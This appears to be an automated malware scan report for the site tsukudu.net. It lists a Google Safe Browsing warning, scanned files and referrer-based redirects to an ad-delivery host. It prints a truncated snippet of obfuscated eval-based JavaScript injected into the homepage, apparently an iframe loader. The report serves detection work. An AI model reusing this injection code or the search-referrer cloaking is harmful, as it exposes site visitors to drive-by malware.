Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tsukudu.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tsukudu.net/ | 200 OK Content-Length: 68061 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;ff=String.fromCharCode;z="dy";try{document["bo"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,63,62,6a,5a,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,63,62,6a,5a,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,67,69,66,70,6b,5c,5a,6a,58,25,6 Antivirus reports:
| ||
http://tsukudu.net/media/system/js/caption.js | 200 OK Content-Length: 1721 Content-Type: application/x-javascript | clean |
http://tsukudu.net/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 22076 Content-Type: application/x-javascript | clean |
http://tsukudu.net/plugins/system/rokbox/themes/light/rokbox-config.js | 200 OK Content-Length: 2598 Content-Type: application/x-javascript | clean |
http://tsukudu.net/components/com_gantry/admin/widgets/colorchooser/js/mooRainbow.js | 200 OK Content-Length: 14803 Content-Type: application/x-javascript | clean |
http://tsukudu.net/components/com_gantry/admin/widgets/slider/js/slider.js | 200 OK Content-Length: 3118 Content-Type: application/x-javascript | clean |
http://tsukudu.net/components/com_gantry/admin/widgets/selectbox/js/selectbox.js | 200 OK Content-Length: 3019 Content-Type: application/x-javascript | clean |
http://tsukudu.net/templates/rt_crystalline_j15/js/preset-creator.js | 200 OK Content-Length: 11710 Content-Type: application/x-javascript | clean |
http://tsukudu.net/components/com_gantry/js/gantry-buildspans.js | 200 OK Content-Length: 797 Content-Type: application/x-javascript | clean |
http://tsukudu.net/components/com_gantry/js/gantry-inputs.js | 200 OK Content-Length: 2952 Content-Type: application/x-javascript | clean |
http://tsukudu.net/modules/mod_roknavmenu/themes/fusion/js/fusion.js | 200 OK Content-Length: 12721 Content-Type: application/x-javascript | clean |
http://tsukudu.net/modules/mod_roktabs/tmpl/roktabs.js | 200 OK Content-Length: 5673 Content-Type: application/x-javascript | clean |
http://tsukudu.net/index.php/about | 200 OK Content-Length: 62414 Content-Type: text/html | clean |
http://tsukudu.net/index.php/services | 200 OK Content-Length: 59434 Content-Type: text/html | clean |
http://tsukudu.net/index.php/clients | 200 OK Content-Length: 61364 Content-Type: text/html | clean |
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://tsukudu.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: tsukudu.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 26 Dec 2014 04:51:47 GMT Location: http://bhrigu.advertisewiththedevil.com/www/delivery/spc.php?zones=1%7C12%7C13%7C14%7C15%7C16%7C17%7C18%7C19%7C20%7C21%7C22%7C23%7C24%7C25%7C26%7C27%7C28%7C29%7C30%7C31%7C32%7C33%7C34%7C35%7C36%7C37%7C38%7C39%7C40%7C41%7C42%7C43%7C44%7C45%7C46%7C47%7C48%7C49%7C50%7C51%7C52%7C53%7C54%7C55%7C56%7C57%7C58%7C59%7C60%7C61%7C62%7C63%7C64%7C65%7C66%7C67%7C68%7C69%7C70%7C71%7C72%7C73%7C74%7C75%7C76%7C77%7C78%7C79%7C80%7C81%7C82%7C83%7C84%7C85%7C86%7C87%7C88%7C89%7C90%7C91%7C92%7C93%7C95%7C96%7C97%7C98%7C101%7C102%7C103%7C104%7C105%7C106%7C107%7C108%7C109%7C110%7C111%7C112%7C113%7C114%7C115%7C116%7C117%7C118%7C119%7C120%7C122%7C123%7C124%7C125%7C126%7C127%7C129%7C131%7C132%7C180%7C181%7C182%7C183%7C184%7C185%7C191%7C192%7C193%7C194%7C195%7C196%7C197%7C200%7C201%7C202%7C203%7C221%7C224%7C226&source=&r=78815534&charset=UTF-8&loc=http%3A%2F%2Ftsukudu.net%2F Server: Apache Content-Length: 1057 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: ZhL=47; path=/; domain=tsukudu.net; expires=Fri, 02-Jan-2015 09:59:47 GMT | suspicious |
URL: http://bhrigu.advertisewiththedevil.com/www/delivery/spc.php?zones=1%7C12%7C13%7C14%7C15%7C16%7C17%7C18%7C19%7C20%7C21%7C22%7C23%7C24%7C25%7C26%7C27%7C28%7C29%7C30%7C31%7C32%7C33%7C34%7C35%7C36%7C37%7C38%7C39%7C40%7C41%7C42%7C43%7C44%7C45%7C46%7C47%7C48%7C49%7C50%7C51%7C52%7C53%7C54%7C55%7C56%7C57%7C58%7C59%7C60%7C61%7C62%7C63%7C64%7C65%7C66%7C67%7C68%7C69%7C70%7C71%7C72%7C73%7C74%7C75%7C76%7C77%7C78%7C79%7C80%7C81%7C82%7C83%7C84%7C85%7C86%7C87%7C88%7C89%7C90%7C91%7C92%7C93%7C95%7C96%7C97%7C98%7C101%7C102%7C103%7C104%7C105%7C106%7C107%7C108%7C109%7C110%7C111%7C112%7C113%7C114%7C115%7C116%7C117%7C118%7C119%7C120%7C122%7C123%7C124%7C125%7C126%7C127%7C129%7C131%7C132%7C180%7C181%7C182%7C183%7C184%7C185%7C191%7C192%7C193%7C194%7C195%7C196%7C197%7C200%7C201%7C202%7C203%7C221%7C224%7C226&source=&r=78815534&charset=UTF-8&loc=http%3A%2F%2Ftsukudu.net%2F (imitation of visitor from search engine) GET /www/delivery/spc.php?zones=1%7C12%7C13%7C14%7C15%7C16%7C17%7C18%7C19%7C20%7C21%7C22%7C23%7C24%7C25%7C26%7C27%7C28%7C29%7C30%7C31%7C32%7C33%7C34%7C35%7C36%7C37%7C38%7C39%7C40%7C41%7C42%7C43%7C44%7C45%7C46%7C47%7C48%7C49%7C50%7C51%7C52%7C53%7C54%7C55%7C56%7C57%7C58%7C59%7C60%7C61%7C62%7C63%7C64%7C65%7C66%7C67%7C68%7C69%7C70%7C71%7C72%7C73%7C74%7C75%7C76%7C77%7C78%7C79%7C80%7C81%7C82%7C83%7C84%7C85%7C86%7C87%7C88%7C89%7C90%7C91%7C92%7C93%7C95%7C96%7C97%7C98%7C101%7C102%7C103%7C104%7C105%7C106%7C107%7C108%7C109%7C110%7C111%7C112%7C113%7C114%7C115%7C116%7C117%7C118%7C119%7C120%7C122%7C123%7C124%7C125%7C126%7C127%7C129%7C131%7C132%7C180%7C181%7C182%7C183%7C184%7C185%7C191%7C192%7C193%7C194%7C195%7C196%7C197%7C200%7C201%7C202%7C203%7C221%7C224%7C226&source=&r=78815534&charset=UTF-8&loc=http%3A%2F%2Ftsukudu.net%2F HTTP/1.1 Host: bhrigu.advertisewiththedevil.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 26 Dec 2014 05:04:25 GMT Location: http://www.google.com Server: nginx/1.4.5 Content-Length: 160 Content-Type: text/html | suspicious |